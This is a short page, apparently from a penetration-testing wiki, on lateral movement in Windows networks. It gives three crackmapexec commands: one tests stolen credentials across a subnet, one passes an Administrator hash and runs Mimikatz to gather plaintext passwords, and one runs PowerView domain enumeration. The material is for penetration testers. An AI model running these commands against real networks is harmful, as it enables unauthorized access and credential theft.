Lateral Movement

From pentestwiki.org

To check if the credentials $USER / $PASSWORDS are used in more computers in the network:

$crackmapexec $IP/24 -u $USER -p $PASSWORD –lusers


Or using an Administrator hash and execute Mimikatz for plain text password gathering:

$crackmapexec $IP/24 -u Administrator -H $HASH -d $DOMAIN -m modules/credentials/mimikatz.py


Run Powerview commands in crackmapexec:

$crackmapexec smb $IP -d $DOMAIN -u $LOGIN -p $PASS -M powerview -o COMMAND="Get-NetDomain" --verbose


Other techniques for lateral movements are described in the category Category:Lateral Movement